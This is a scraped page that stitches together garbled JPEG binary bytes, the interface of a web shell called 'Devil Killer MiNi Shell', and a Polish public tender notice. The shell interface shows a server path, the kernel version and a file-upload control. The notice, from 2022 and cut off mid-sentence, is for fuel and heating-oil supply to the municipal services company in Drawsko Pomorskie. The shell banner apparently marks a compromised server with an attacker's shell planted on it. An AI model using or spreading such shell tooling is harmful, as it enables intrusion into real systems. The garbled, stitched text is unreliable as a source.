JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220207/0004798501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa sprzedaży bezgotówkowej paliw płynnych i produktów ropopochodnych dla Zakładu Usług Komunalnych w Drawsku Pomorskim, poprzez tankowanie pojazdów Zamawiającego w stacji paliw Wykonawcy </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Usług Komunalnych w Drawsku Pomorskim</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 330923605</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jana III Sobieskiego 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Drawsko Pomorskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">78-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL427 - Szczecinecko-pyrzycki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">w.majewski@zukdrawsko.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zukdrawskopomorskie.bip.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Utrzymanie czustości i zieleni na terenie miasta i gminy </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa sprzedaży bezgotówkowej paliw płynnych i produktów ropopochodnych dla Zakładu Usług Komunalnych w Drawsku Pomorskim, poprzez tankowanie pojazdów Zamawiającego w stacji paliw Wykonawcy </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c1fdf9cf-84ca-11ec-beb3-a2bfa38226ab</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00047985</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00044894/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługa sprzedaży bezgotówkowej paliw płynnych i produktów ropopochodnych dla Zakładu Usług Komunalnych w Drawsku Pomorskim, poprzez tankowanie pojazdów Zamawiającego w stacji paliw Wykonawcy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/<br/>https://zukdrawskopomorskie.bip.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia, komunikowanie się między Zamawiającym a wykonawcami<br/>odbywa się będzie przy użyciu miniPortalu https://miniportal.uzp.gov.pl., ePUAP.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy<br/>złożenia, zmiany, wycofania ofert lub wniosku oraz do formularza do komunikacji.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu,<br/>opisane zostały w Regulaminie korzystania z mini portalu oraz Regulaminie ePUAP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Nr sprawy 1/ PN-ZUK / 2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Realizacja części 1 niniejszego zamówienia:<br/><br/>a) Zamawiający wymaga, aby proponowany punkt tankowania benzyny bezołowiowej Pb 95 i oleju napędowego ON znajdował się w odległości nie większej niż 10 km od siedziby Zamawiającego.<br/><br/>b) Wybrana stacja paliw winna być czynna od poniedziałku do soboty co najmniej w godzinach od 7:00 do 15:00, a w okresie zimowym tj. od dnia 1 listopada do 31 marca całodobowo we wszystkie dni tygodnia. W sytuacji, gdy po wskazanym wyżej okresie zimowym nastąpi zmiana warunków atmosferycznych powodujących konieczność całodobowej pracy Zamawiającego, Wykonawca zobowiązany jest zapewnić w tym okresie całodobową obsługę stacji.<br/><br/>c) Benzynę bezołowiową Pb 95 i olej napędowy ON będą pobierali upoważnieni pracownicy ZUK w Drawsku Pomorskim, wyłącznie do pojazdów wskazanych na piśmie przez Zamawiającego. Zamawiający załączy do umowy z wybranym Wykonawcą wykaz pojazdów wraz z ich numerami rejestracyjnymi oraz wykaz sprzętu. O każdorazowej zmianie stanu pojazdów i maszyn Zamawiający powiadomi pisemnie Wykonawcę. <br/><br/>d) Sprzedaż benzyny bezołowiowej Pb i oleju napędowego ON będzie odbywać się sukcesywnie poprzez bezgotówkowe tankowanie pojazdów do zbiornika oraz do kanistrów. Częstotliwość uzależniona będzie od potrzeb zamawiającego. Każda ilość pobranego paliwa zostanie potwierdzona w karcie drogowej lub raporcie pracy sprzętu.<br/><br/>e) W karcie drogowej lub raporcie pracy sprzętu pracownik stacji paliw wydający paliwo zobowiązany jest wpisać ceny 1 litra tankowanego paliwa uwidocznioną na dystrybutorze w czasie tankowania pojazdu.<br/><br/>f) W przypadku stosowania kart paliwowych / flotowych, dodatkowo każda transakcja bezgotówkowa zostanie zarejestrowana w systemie z podaniem numeru transakcji bezgotówkowej, daty, miejsca, wartości i ilości zakupionych paliw. Dokonanie przez użytkownika kart flotowych, transakcji bezgotówkowej potwierdzone zostanie wydrukiem z terminalu albo pokwitowaniem. <br/><br/>g) Faktury wystawione przez Wykonawcę powinny zawierać pełny monitoring transakcji (data, miejsce, ilość, cena 1 litra benzyny bezołowiowej Pb 95 i oleju napędowego ON z wyszczególnieniem numeru rejestracyjnego samochodu). Rozliczanie zawartych transakcji następować będzie fakturami VAT wystawianymi, co 10 dni, z terminami płatności nie krótszymi niż 21 dni od daty otrzymania faktur.<br/><br/>h) Podstawą do rozliczenia za zakup paliw płynnych w okresie obowiązywania umowy będą ceny za 1 litr tankowanego paliwa obowiązujące na stacjach paliw Wykonawcy uwidocznione na dystrybutorze w momencie tankowania paliw przez Zamawiającego pomniejszone o wskaźnik obniżki cen podany w ofercie (deklarowany upust / rabat).<br/><br/>i) W przypadku stosowania kart paliwowych / flotowych, Wykonawca ma obowiązek dołączyć do faktury wykaz wszystkich zakupów z danego okresu rozliczeniowego dokonywanych na poszczególne karty paliwowe, tj. numery kart, numery rejestracyjne pojazdów, ilość i ceny jednostkowe brutto zakupionych paliw, wartość (netto, brutto, VAT) paliw. Dla każdej pozycji faktury winna być wskazana wartość brutto przed upustem / rabatem, wielkość upustu / rabatu, wartość (brutto, VAT, netto) po upuście / rabacie. Zamawiający dopuszcza aby wielkość upustu / rabatu, wartości (brutto, VAT, netto) po upuście / rabacie były to wartości zbiorcze dla danego rodzaju paliwa.<br/><br/>j) Strony ustalają, że w okresie obowiązywania umowy sprzedaż paliw płynnych odbywać się będą po cenach detalicznych brutto obowiązujących na danej stacji paliw Wykonawcy w momencie realizacji transakcji, przy uwzględnieniu stałego upustu / rabatu określonego w ofercie.<br/><br/>k) Procentowe wskaźniki obniżki cen podane w ofercie będę obowiązywały przez cały okres obowiązywania umowy.<br/><br/>l) Jeśli Wykonawca składający ofertę nie zadeklaruje wskaźnika obniżki cen (upust, rabat), to ceny widniejące na ofercie będą obowiązywały przez cały okres trwania umowy. W trakcie obowiązywania umowy ceny, o których mowa będą mogły ulec zmianie, wyłącznie z zachowaniem poniższych reguł kształtowania ich wysokości:<br/>	cena benzyny bezołowiowej Pb ustalona będzie w oparciu o hurtową cenę netto benzyny bezołowiowej 95 np. Grupy Lotos S.A. lub Grupy PKN Orlen z dnia zakupu, powiększoną o 23% podatku VAT oraz 0,20 zł za litr brutto stałej marży Dostawcy.<br/>	cena oleju napędowego ustalona będzie w oparciu o hurtową cenę netto oleju napędowego Eurodiesel np. Grupy Lotos S.A. lub Grupy PKN Orlen z dnia zakupu powiększoną o 23% podatku VAT oraz 0,20 zł za litr brutto stałej marży Dostawcy.<br/><br/>m) Wykonawca przedstawi na każde żądanie Zamawiającego i w terminie przez niego wskazanym świadectwa jakości na daną partię paliw.<br/><br/>n) W przypadku gdy bezgotówkowy system rozliczania należności stosowany przez Wykonawcę wymagać będzie dodatkowych elementów w postaci np. kart paliwowych / flotowych. Wykonawca dostarczy je na własny koszt bez ponoszenia jakichkolwiek dodatkowych kosztów przez Zamawiającego w terminie nie dłuższym niż 10 dni od dnia podpisania umowy, a w razie ich utraty Wykonawca wyda karty dodatkowe lub zamienne wg cennika obowiązującego u Wykonawcy. Wykonawca ma zapewnić blokady karty po zgłoszeniu jej utraty w sieci punktów sprzedaży. Zamawiający wymaga, aby na etapie podpisywania umowy Wykonawca przedłożył regulamin używania ww. kart.<br/>Karty wystawione zostaną na imiona i nazwiska pracowników Zamawiającego. Wykaz pracowników oraz wykaz sprzętu i pojazdów stanowił będzie załącznik do umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09134100-8 - Olej napędowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09132100-4 - Benzyna bezołowiowa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagami oraz w następujący sposób będzie oceniał kryteria:<br/><br/>a) Część 1 - dostawa benzyny bezołowiowej Pb 95 i oleju napędowego ON<br/><br/>Cena - 60 %<br/>Wskaźnik obniżki ceny 1 litra benzyny bezołowiowej Pb 95 i oleju opałowego ON - 40%<br/><br/>Oferty oceniane będą według wzorów:<br/><br/>Cn UONb<br/>— x 60% x 100 + — x 40% x 100 <br/>Cb UONn<br/><br/>Cn UPbb<br/>— x 60% x 100 + — x 40% x 100 <br/>Cb UPbn<br/><br/>gdzie:<br/>Cn - najniższa cena spośród ofert nieodrzuconych,<br/>Cb - cena oferty badanej,<br/>60% - procentowe znaczenie kryterium „ceny”<br/>100 - wskaźnik stały,<br/>UONb - wskaźnik obniżki ceny 1 litra oleju napędowego ON oferty badanej,<br/>UONn - najwyższy wskaźnik obniżki ceny 1 litra benzyny oleju napędowego ON spośród ofert nieodrzuconych,<br/>40% - procentowe znaczenie kryterium „Wskaźnik obniżki ceny 1 litra benzyny bezołowiowej Pb 95 i oleju opałowego ON”<br/>UPbn - najwyższy wskaźnik obniżki ceny 1 litra benzyny bezołowiowej Pb 95 spośród ofert nieodrzuconych,<br/>UPbb - wskaźnik obniżki ceny 1 litra benzyny bezołowiowej Pb 95 oferty badanej,</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Realizacja części 2 niniejszego zamówienia:<br/><br/>a) Dostawy oleju opałowego z przeznaczeniem na cele grzewcze odbywać się będą autocysterną Wykonawcy, spełniającą wymagania określone w ustawie z dnia 20 grudnia 2019 r. o przewozie towarów niebezpiecznych (tekst jednolity Dz. U. z 2020 r. poz. 154). <br/><br/>b) Dostawy oleju opałowego do Zamawiającego będą realizowane sukcesywnie i bezgotówkowo według potrzeb Zamawiającego od poniedziałku do piątku między godz. 7:00 a 15:00 w czasie nie dłuższym niż 48 godziny od złożenia zamówienia. Dostawa w innym terminie musi być uzgodniona między Zamawiającym i Wykonawcą.<br/><br/>c) Tankowanie oleju opałowego odbywać się będzie bezpośrednio do zbiornika pieca c.o. w siedzibie Zamawiającego.<br/><br/>d) Rozliczanie zawartych transakcji następować będzie fakturami VAT, z terminami płatności nie krótszymi niż 21 dni od daty otrzymania faktur.<br/><br/>e) Koszty dostaw oraz wszystkie inne koszty Wykonawca zobowiązany jest wliczyć w oferowaną cenę jednostkową oleju opałowego. <br/><br/>f) Cena, podana na ofercie Wykonawcy będzie obowiązywać przez cały okres trwania umowy.<br/><br/>g) Cena oleju opałowego jest ceną ostateczną obejmującą wszystkie koszty i składniki związane z realizacją zamówienia, w tym m.in, upusty, rabaty.<br/><br/>h) W trakcie obowiązywania umowy cena może ulec zmianie, wyłącznie z zachowaniem poniższych reguł kształtowania ich wysokości:<br/>	cena oleju opałowego ustalona będzie w oparciu o hurtową cenę netto oleju opałowego np. Grupy Lotos S.A. lub Grupy PKN Orlen z dnia dostawy powiększoną o 23% podatku VAT oraz 0,20 zł za litr brutto stałej marży Dostawcy. <br/><br/>i) Do oleju opałowego, stosuje się wymagania jakościowe, określone w Rozporządzeniu Ministra Gospodarki i Pracy w sprawie wymagań jakościowych dla paliw ciekłych.<br/> <br/>j) Określona ilość oleju opałowego jest ilością szacunkową. Zamawiający zastrzega sobie możliwość zakupu mniejszej ilości oleju opałowego i nie może to stanowić podstawy do wnoszenia przez Wykonawcę jakichkolwiek roszczeń.<br/><br/>5. Wymagania szczegółowe stawiane Wykonawcy:<br/><br/>a) Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia oraz terminowe wykonanie zamówienia.<br/><br/>b) Wymagana jest należyta staranność przy realizacji zobowiązań umowy.<br/><br/>c) Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy.<br/><br/>d) Wykonawca winien określić numer telefonu kontaktowego i adres e-mailowy niezbędne do sprawnego i terminowego wykonania zamówienia.<br/><br/>e) Wykonawca odpowiada za szkody spowodowane wadami fizycznymi sprzedanego paliwa. W celu naprawienia ewentualnych szkód Wykonawca, po pisemnym zawiadomieniu przez Zamawiającego o podejrzeniu złej jakości paliwa, przeprowadzi postępowanie reklamacyjne. Wykonawca zobowiązany jest rozpatrzyć reklamację bez zbędnej zwłoki, jednak nie później niż w ciągu 14 dni, licząc od daty jej otrzymania i zawiadomi pisemnie Zamawiającego o jej rozstrzygnięciu. Brak odpowiedzi na zgłoszoną reklamację w ciągu 14 dni od daty jej otrzymania przez Wykonawcę uważane będzie przez Zamawiającego za uznanie reklamacji. W przypadku uznania reklamacji Wykonawca pokrywa wartość poniesionej szkody do wysokości udokumentowanej odpowiednimi rachunkami (np. za naprawy). <br/><br/>f) Rozliczenia pomiędzy zamawiającym a przyszłymi wykonawcami zamówienia odbywać się będą w złotych polskich. Zamawiający nie przewiduje rozliczeń w walutach obcych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09135100-5 - Olej opałowy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagami oraz w następujący sposób będzie oceniał kryteria:<br/>Część 2 - dostawa oleju opałowego<br/><br/>Kryterium - cena - 100% <br/><br/>Ocena pod względem kryterium ceny polega na ustaleniu oferty o najniższej proponowanej cenie, porównaniu proponowanej ceny kolejnych ofert z ofertą o najniższej proponowanej cenie i przydzieleniu odpowiedniej liczby punktów wg wzoru:<br/><br/>Pc = (Cn : Co ) x 100p.<br/><br/>gdzie: <br/>Cn – oznacza cenę netto oferty o najniższej proponowanej cenie <br/>Co – oznacza cenę netto oferty badanej<br/>Pc – oznacza wartość punktową kryterium ceny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O zamówienie mogą ubiegać się wykonawcy, którzy:<br/>a) Nie podlegają wykluczeniu na podstawie art. 108 ust. l, art. 109 ust. l ustawy.<br/>b) Spełniają warunki udziału w postępowaniu, o których mowa w art. 112 ust. 1-2 ustawy<br/>zakresie:<br/>􀀀 Zdolności do występowania w obrocie gospodarczym. Zamawiający uzna warunek za<br/>spełniony jeżeli Wykonawca wykaże, że posiada aktualną koncesję wydaną przez Prezesa<br/>Urzędu Regulacji Energetyki uprawniającą go do wykonywania działalności gospodarczej w<br/>zakresie obrotu paliwami ciekłymi objętymi niniejszym zamówieniem.<br/>􀀀 Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile to<br/>wynika z odrębnych przepisów.<br/>􀀀 Sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.<br/>􀀀 Zdolności technicznej lub zawodowej. Zamawiający uzna warunek za spełniony jeżeli<br/>Wykonawca wykaże, że dysponuje , co najmniej jedną stacją paliw lub punktów tankowania<br/>zlokalizowanych w odległości nie większej niż 10 km od siedziby Zamawiającego mierzoną<br/>najkrótszym dojazdem drogą publiczną, czynną w dni robocze od poniedziałku do piątku co<br/>najmniej od godz. 7.00 do godz. 15.00<br/>c) Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku<br/>istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie w jakim powołuje się na<br/>ich zasoby, warunków udziału w postępowaniu, zamieszcza informacje o tych podmiotach w<br/>oświadczeniu o spełnianiu warunków i oświadczeniu o niepodleganiu wykluczeniu.<br/>d) Jeżeli Wykonawca zamierza powierzyć wykonanie części zamówienia podwykonawcom, w<br/>celu wykazania braku istnienia wobec nich podstaw wykluczenia z udziału w 